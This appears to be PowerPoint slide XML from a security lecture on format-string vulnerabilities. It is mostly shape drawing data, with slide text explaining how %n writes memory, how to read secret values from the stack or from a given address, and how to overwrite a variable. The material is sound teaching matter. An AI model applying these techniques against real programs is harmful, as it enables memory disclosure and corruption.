                <a:gd name="T14" fmla="*/ 33 w 218"/>
                <a:gd name="T15" fmla="*/ 8 h 318"/>
                <a:gd name="T16" fmla="*/ 17 w 218"/>
                <a:gd name="T17" fmla="*/ 0 h 318"/>
                <a:gd name="T18" fmla="*/ 0 w 218"/>
                <a:gd name="T19" fmla="*/ 20 h 318"/>
                <a:gd name="T20" fmla="*/ 0 w 218"/>
                <a:gd name="T21" fmla="*/ 41 h 318"/>
                <a:gd name="T22" fmla="*/ 17 w 218"/>
                <a:gd name="T23" fmla="*/ 62 h 318"/>
                <a:gd name="T24" fmla="*/ 35 w 218"/>
                <a:gd name="T25" fmla="*/ 38 h 318"/>
                <a:gd name="T26" fmla="*/ 166 w 218"/>
                <a:gd name="T27" fmla="*/ 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318">
                  <a:moveTo>
                    <a:pt x="166" y="38"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="130"/>
                    <a:pt x="63" y="240"/>
                    <a:pt x="63" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="301"/>
                    <a:pt x="63" y="318"/>
                    <a:pt x="81" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="318"/>
                    <a:pt x="98" y="312"/>
                    <a:pt x="98" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="156"/>
                    <a:pt x="176" y="69"/>
                    <a:pt x="207" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="31"/>
                    <a:pt x="218" y="30"/>
                    <a:pt x="218" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="218" y="8"/>
                    <a:pt x="206" y="8"/>
                    <a:pt x="198" y="8"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="33" y="8"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="21" y="0"/>
                    <a:pt x="17" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="11"/>
                    <a:pt x="0" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="41"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="51"/>
                    <a:pt x="0" y="62"/>
                    <a:pt x="17" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="62"/>
                    <a:pt x="35" y="52"/>
                    <a:pt x="35" y="38"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="166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0" name="Freeform 262">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{442605DD-C066-40B5-B108-4FE80965348F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8562976" y="3267075"/>
              <a:ext cx="82550" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 109 w 217"/>
                <a:gd name="T1" fmla="*/ 131 h 316"/>
                <a:gd name="T2" fmla="*/ 41 w 217"/>
                <a:gd name="T3" fmla="*/ 80 h 316"/>
                <a:gd name="T4" fmla="*/ 109 w 217"/>
                <a:gd name="T5" fmla="*/ 31 h 316"/>
                <a:gd name="T6" fmla="*/ 176 w 217"/>
                <a:gd name="T7" fmla="*/ 80 h 316"/>
                <a:gd name="T8" fmla="*/ 109 w 217"/>
                <a:gd name="T9" fmla="*/ 131 h 316"/>
                <a:gd name="T10" fmla="*/ 148 w 217"/>
                <a:gd name="T11" fmla="*/ 146 h 316"/>
                <a:gd name="T12" fmla="*/ 210 w 217"/>
                <a:gd name="T13" fmla="*/ 80 h 316"/>
                <a:gd name="T14" fmla="*/ 109 w 217"/>
                <a:gd name="T15" fmla="*/ 0 h 316"/>
                <a:gd name="T16" fmla="*/ 7 w 217"/>
                <a:gd name="T17" fmla="*/ 80 h 316"/>
                <a:gd name="T18" fmla="*/ 69 w 217"/>
                <a:gd name="T19" fmla="*/ 146 h 316"/>
                <a:gd name="T20" fmla="*/ 0 w 217"/>
                <a:gd name="T21" fmla="*/ 224 h 316"/>
                <a:gd name="T22" fmla="*/ 109 w 217"/>
                <a:gd name="T23" fmla="*/ 316 h 316"/>
                <a:gd name="T24" fmla="*/ 217 w 217"/>
                <a:gd name="T25" fmla="*/ 224 h 316"/>
                <a:gd name="T26" fmla="*/ 148 w 217"/>
                <a:gd name="T27" fmla="*/ 146 h 316"/>
                <a:gd name="T28" fmla="*/ 109 w 217"/>
                <a:gd name="T29" fmla="*/ 285 h 316"/>
                <a:gd name="T30" fmla="*/ 34 w 217"/>
                <a:gd name="T31" fmla="*/ 223 h 316"/>
                <a:gd name="T32" fmla="*/ 109 w 217"/>
                <a:gd name="T33" fmla="*/ 161 h 316"/>
                <a:gd name="T34" fmla="*/ 183 w 217"/>
                <a:gd name="T35" fmla="*/ 223 h 316"/>
                <a:gd name="T36" fmla="*/ 109 w 217"/>
                <a:gd name="T3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7" h="316">
                  <a:moveTo>
                    <a:pt x="109" y="131"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="131"/>
                    <a:pt x="41" y="108"/>
                    <a:pt x="41" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="55"/>
                    <a:pt x="69" y="31"/>
                    <a:pt x="109" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="31"/>
                    <a:pt x="176" y="55"/>
                    <a:pt x="176" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="109"/>
                    <a:pt x="145" y="131"/>
                    <a:pt x="109" y="131"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="148" y="146"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="133"/>
                    <a:pt x="210" y="108"/>
                    <a:pt x="210" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="39"/>
                    <a:pt x="168" y="0"/>
                    <a:pt x="109" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="0"/>
                    <a:pt x="7" y="40"/>
                    <a:pt x="7" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="108"/>
                    <a:pt x="30" y="133"/>
                    <a:pt x="69" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="157"/>
                    <a:pt x="0" y="186"/>
                    <a:pt x="0" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="272"/>
                    <a:pt x="46" y="316"/>
                    <a:pt x="109" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="316"/>
                    <a:pt x="217" y="272"/>
                    <a:pt x="217" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="186"/>
                    <a:pt x="185" y="157"/>
                    <a:pt x="148" y="146"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="109" y="285"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="285"/>
                    <a:pt x="34" y="258"/>
                    <a:pt x="34" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="193"/>
                    <a:pt x="63" y="161"/>
                    <a:pt x="109" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="161"/>
                    <a:pt x="183" y="193"/>
                    <a:pt x="183" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="258"/>
                    <a:pt x="150" y="285"/>
                    <a:pt x="109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1" name="Freeform 263">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC94B80D-F540-4810-8A90-44A2AF81C545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8664576" y="3267075"/>
              <a:ext cx="79375" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 8 w 210"/>
                <a:gd name="T1" fmla="*/ 281 h 310"/>
                <a:gd name="T2" fmla="*/ 0 w 210"/>
                <a:gd name="T3" fmla="*/ 295 h 310"/>
                <a:gd name="T4" fmla="*/ 21 w 210"/>
                <a:gd name="T5" fmla="*/ 310 h 310"/>
                <a:gd name="T6" fmla="*/ 190 w 210"/>
                <a:gd name="T7" fmla="*/ 310 h 310"/>
                <a:gd name="T8" fmla="*/ 210 w 210"/>
                <a:gd name="T9" fmla="*/ 290 h 310"/>
                <a:gd name="T10" fmla="*/ 210 w 210"/>
                <a:gd name="T11" fmla="*/ 277 h 310"/>
                <a:gd name="T12" fmla="*/ 193 w 210"/>
                <a:gd name="T13" fmla="*/ 257 h 310"/>
                <a:gd name="T14" fmla="*/ 175 w 210"/>
                <a:gd name="T15" fmla="*/ 280 h 310"/>
                <a:gd name="T16" fmla="*/ 57 w 210"/>
                <a:gd name="T17" fmla="*/ 280 h 310"/>
                <a:gd name="T18" fmla="*/ 155 w 210"/>
                <a:gd name="T19" fmla="*/ 197 h 310"/>
                <a:gd name="T20" fmla="*/ 210 w 210"/>
                <a:gd name="T21" fmla="*/ 97 h 310"/>
                <a:gd name="T22" fmla="*/ 99 w 210"/>
                <a:gd name="T23" fmla="*/ 0 h 310"/>
                <a:gd name="T24" fmla="*/ 0 w 210"/>
                <a:gd name="T25" fmla="*/ 83 h 310"/>
                <a:gd name="T26" fmla="*/ 23 w 210"/>
                <a:gd name="T27" fmla="*/ 107 h 310"/>
                <a:gd name="T28" fmla="*/ 45 w 210"/>
                <a:gd name="T29" fmla="*/ 85 h 310"/>
                <a:gd name="T30" fmla="*/ 38 w 210"/>
                <a:gd name="T31" fmla="*/ 69 h 310"/>
                <a:gd name="T32" fmla="*/ 96 w 210"/>
                <a:gd name="T33" fmla="*/ 31 h 310"/>
                <a:gd name="T34" fmla="*/ 175 w 210"/>
                <a:gd name="T35" fmla="*/ 97 h 310"/>
                <a:gd name="T36" fmla="*/ 118 w 210"/>
                <a:gd name="T37" fmla="*/ 189 h 310"/>
                <a:gd name="T38" fmla="*/ 8 w 210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310">
                  <a:moveTo>
                    <a:pt x="8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3" y="310"/>
                    <a:pt x="21" y="310"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="190" y="310"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="310"/>
                    <a:pt x="210" y="306"/>
                    <a:pt x="210" y="290"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="210" y="277"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="268"/>
                    <a:pt x="210" y="257"/>
                    <a:pt x="193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7" y="280"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="255"/>
                    <a:pt x="134" y="217"/>
                    <a:pt x="155" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="169"/>
                    <a:pt x="210" y="137"/>
                    <a:pt x="210" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="38"/>
                    <a:pt x="159" y="0"/>
                    <a:pt x="99" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="0"/>
                    <a:pt x="0" y="41"/>
                    <a:pt x="0" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="102"/>
                    <a:pt x="14" y="107"/>
                    <a:pt x="23" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="107"/>
                    <a:pt x="45" y="99"/>
                    <a:pt x="45" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="79"/>
                    <a:pt x="42" y="72"/>
                    <a:pt x="38" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="46"/>
                    <a:pt x="69" y="31"/>
                    <a:pt x="96" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="31"/>
                    <a:pt x="175" y="54"/>
                    <a:pt x="175" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="132"/>
                    <a:pt x="151" y="161"/>
                    <a:pt x="118" y="189"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8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2" name="Freeform 264">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9DFA1ED-B751-4849-92F2-109350777489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8764589" y="3270250"/>
              <a:ext cx="79375" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 112 w 209"/>
                <a:gd name="T1" fmla="*/ 110 h 310"/>
                <a:gd name="T2" fmla="*/ 52 w 209"/>
                <a:gd name="T3" fmla="*/ 125 h 310"/>
                <a:gd name="T4" fmla="*/ 52 w 209"/>
                <a:gd name="T5" fmla="*/ 30 h 310"/>
                <a:gd name="T6" fmla="*/ 172 w 209"/>
                <a:gd name="T7" fmla="*/ 30 h 310"/>
                <a:gd name="T8" fmla="*/ 192 w 209"/>
                <a:gd name="T9" fmla="*/ 15 h 310"/>
                <a:gd name="T10" fmla="*/ 172 w 209"/>
                <a:gd name="T11" fmla="*/ 0 h 310"/>
                <a:gd name="T12" fmla="*/ 38 w 209"/>
                <a:gd name="T13" fmla="*/ 0 h 310"/>
                <a:gd name="T14" fmla="*/ 18 w 209"/>
                <a:gd name="T15" fmla="*/ 20 h 310"/>
                <a:gd name="T16" fmla="*/ 18 w 209"/>
                <a:gd name="T17" fmla="*/ 153 h 310"/>
                <a:gd name="T18" fmla="*/ 34 w 209"/>
                <a:gd name="T19" fmla="*/ 173 h 310"/>
                <a:gd name="T20" fmla="*/ 49 w 209"/>
                <a:gd name="T21" fmla="*/ 166 h 310"/>
                <a:gd name="T22" fmla="*/ 112 w 209"/>
                <a:gd name="T23" fmla="*/ 141 h 310"/>
                <a:gd name="T24" fmla="*/ 175 w 209"/>
                <a:gd name="T25" fmla="*/ 210 h 310"/>
                <a:gd name="T26" fmla="*/ 98 w 209"/>
                <a:gd name="T27" fmla="*/ 279 h 310"/>
                <a:gd name="T28" fmla="*/ 38 w 209"/>
                <a:gd name="T29" fmla="*/ 248 h 310"/>
                <a:gd name="T30" fmla="*/ 44 w 209"/>
                <a:gd name="T31" fmla="*/ 232 h 310"/>
                <a:gd name="T32" fmla="*/ 22 w 209"/>
                <a:gd name="T33" fmla="*/ 210 h 310"/>
                <a:gd name="T34" fmla="*/ 0 w 209"/>
                <a:gd name="T35" fmla="*/ 234 h 310"/>
                <a:gd name="T36" fmla="*/ 98 w 209"/>
                <a:gd name="T37" fmla="*/ 310 h 310"/>
                <a:gd name="T38" fmla="*/ 209 w 209"/>
                <a:gd name="T39" fmla="*/ 210 h 310"/>
                <a:gd name="T40" fmla="*/ 112 w 209"/>
                <a:gd name="T41" fmla="*/ 1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112" y="110"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="110"/>
                    <a:pt x="73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2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50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0" y="246"/>
                    <a:pt x="44" y="242"/>
                    <a:pt x="44" y="232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09" y="265"/>
                    <a:pt x="209" y="210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="159"/>
                    <a:pt x="171" y="110"/>
                    <a:pt x="11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3" name="Freeform 265">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B94ADA1-1D06-4C27-A2BA-C2C25650801E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8864601" y="3267075"/>
              <a:ext cx="80963" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 8 w 210"/>
                <a:gd name="T1" fmla="*/ 281 h 310"/>
                <a:gd name="T2" fmla="*/ 0 w 210"/>
                <a:gd name="T3" fmla="*/ 295 h 310"/>
                <a:gd name="T4" fmla="*/ 21 w 210"/>
                <a:gd name="T5" fmla="*/ 310 h 310"/>
                <a:gd name="T6" fmla="*/ 190 w 210"/>
                <a:gd name="T7" fmla="*/ 310 h 310"/>
                <a:gd name="T8" fmla="*/ 210 w 210"/>
                <a:gd name="T9" fmla="*/ 290 h 310"/>
                <a:gd name="T10" fmla="*/ 210 w 210"/>
                <a:gd name="T11" fmla="*/ 277 h 310"/>
                <a:gd name="T12" fmla="*/ 193 w 210"/>
                <a:gd name="T13" fmla="*/ 257 h 310"/>
                <a:gd name="T14" fmla="*/ 175 w 210"/>
                <a:gd name="T15" fmla="*/ 280 h 310"/>
                <a:gd name="T16" fmla="*/ 57 w 210"/>
                <a:gd name="T17" fmla="*/ 280 h 310"/>
                <a:gd name="T18" fmla="*/ 156 w 210"/>
                <a:gd name="T19" fmla="*/ 197 h 310"/>
                <a:gd name="T20" fmla="*/ 210 w 210"/>
                <a:gd name="T21" fmla="*/ 97 h 310"/>
                <a:gd name="T22" fmla="*/ 99 w 210"/>
                <a:gd name="T23" fmla="*/ 0 h 310"/>
                <a:gd name="T24" fmla="*/ 0 w 210"/>
                <a:gd name="T25" fmla="*/ 83 h 310"/>
                <a:gd name="T26" fmla="*/ 23 w 210"/>
                <a:gd name="T27" fmla="*/ 107 h 310"/>
                <a:gd name="T28" fmla="*/ 45 w 210"/>
                <a:gd name="T29" fmla="*/ 85 h 310"/>
                <a:gd name="T30" fmla="*/ 38 w 210"/>
                <a:gd name="T31" fmla="*/ 69 h 310"/>
                <a:gd name="T32" fmla="*/ 96 w 210"/>
                <a:gd name="T33" fmla="*/ 31 h 310"/>
                <a:gd name="T34" fmla="*/ 175 w 210"/>
                <a:gd name="T35" fmla="*/ 97 h 310"/>
                <a:gd name="T36" fmla="*/ 118 w 210"/>
                <a:gd name="T37" fmla="*/ 189 h 310"/>
                <a:gd name="T38" fmla="*/ 8 w 210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310">
                  <a:moveTo>
                    <a:pt x="8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3" y="310"/>
                    <a:pt x="21" y="310"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="190" y="310"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="310"/>
                    <a:pt x="210" y="306"/>
                    <a:pt x="210" y="290"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="210" y="277"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="268"/>
                    <a:pt x="210" y="257"/>
                    <a:pt x="193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7" y="280"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="255"/>
                    <a:pt x="134" y="217"/>
                    <a:pt x="156" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="169"/>
                    <a:pt x="210" y="137"/>
                    <a:pt x="210" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="38"/>
                    <a:pt x="160" y="0"/>
                    <a:pt x="99" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="0"/>
                    <a:pt x="0" y="41"/>
                    <a:pt x="0" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="102"/>
                    <a:pt x="14" y="107"/>
                    <a:pt x="23" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="107"/>
                    <a:pt x="45" y="99"/>
                    <a:pt x="45" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="79"/>
                    <a:pt x="42" y="72"/>
                    <a:pt x="38" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="46"/>
                    <a:pt x="69" y="31"/>
                    <a:pt x="96" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="31"/>
                    <a:pt x="175" y="54"/>
                    <a:pt x="175" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="132"/>
                    <a:pt x="151" y="161"/>
                    <a:pt x="118" y="189"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8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4" name="Freeform 266">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42FA7AC6-E0F5-4840-90BB-524A3B4CFE0D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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8964614" y="3303588"/>
              <a:ext cx="79375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60" y="188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03493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D0FD-B02B-478D-9384-4C713615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Print out data on the stack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041B-6427-40E8-8B69-426AA352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Print out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>secret value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t> on the stack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3DE0-5E71-4D25-9EF8-7C46B7ED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B63ABB-760F-4C4F-96DB-3A5AF1E5B2F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3644612" y="1852431"/>
            <a:ext cx="0" cy="236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8AD3BC-2658-437D-B236-C921F06AF653}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257801" y="1852431"/>
            <a:ext cx="0" cy="236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A36FFB-19D3-49CD-B770-F289258F16DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5321206" y="2280391"/>
            <a:ext cx="532518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625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A8C07-BFC7-4D0C-AA4F-60C204258902}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3644612" y="2464119"/>
            <a:ext cx="1613183" cy="19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50" dirty="0"/>
              <a:t>0xaabbccdd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CED7D3-BA70-4F82-88FA-9C50917D72AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3644612" y="3502239"/>
            <a:ext cx="1613183" cy="19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E66C5-83BE-42B4-8355-7DDBEED8FB6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5870561" y="2898495"/>
            <a:ext cx="7791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350" dirty="0"/>
              <a:t>20 bytes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="342581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with varying length of arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How format string works</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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works</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability caused by format string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacks via format-string vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code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83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9C15-D546-45E9-8D7C-AD4D00EF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Print out data not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49E0-DAB7-443D-B86D-9601B50E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How do you print out a secret string that is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u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> stored on the stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>, but its address is stored on the stack?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2B40-A6AC-49BF-A484-3858A57A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1696-26AD-430A-8972-973BB829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Print out data at a specific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6B5B-C52B-4D14-B675-4573D6CC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How do you print out some secret value stored at address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 0xBFFFF304</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>, but this address is NOT stored on the stack?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E4C8-50A5-4638-8FA9-DDD3487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DC33-DC59-48E8-9034-7BE41FCC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Memory modification via format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7973-952D-49B9-8EE4-00FFE189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6361176" cy="37631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</a:rPr>
              <a:t>Goal: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>change the value of </a:t>
            </a:r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variable from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0x11223344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to some other value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: Writes the number of characters printed out so far into memory.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Hello%n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”,&amp;count)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ⇒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gets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, it has already printed 5 characters, so it stores 5 to the provided memory address.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 treats the value pointed by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>va_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> pointer as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>memory address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and writes into that location.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dirty="0"/>
              <a:t>Hence, if we want to write a value to a memory location, we need to have it’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stack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2B753-541B-43E1-AC5C-953A9E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8D9AA-117C-48CD-BE01-974BBF45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38" y="1952538"/>
            <a:ext cx="2387126" cy="9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4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0D62-2638-4311-877F-7CCFF188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2C30-B3F7-413E-B76F-8739DAFE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3"/>
            <a:ext cx="8778240" cy="23489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NZ" dirty="0"/>
              <a:t>Definition: “is the order or sequence of bytes of a word of digital data in computer storage.” (Wikipedia)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>Big-endian (BE)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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" u="sng" dirty="0"/>
              <a:t>most</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t> significant byte               at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" u="sng" dirty="0"/>
              <a:t>smallest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t> memory address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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" u="sng" dirty="0"/>
              <a:t>least</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t> significant byte               at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" u="sng" dirty="0"/>
              <a:t>largest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t> memory address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>Little-endian (LE)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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" u="sng" dirty="0"/>
              <a:t>most</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t> significant byte               at the </a:t>
            </a:r>
            <a:r>
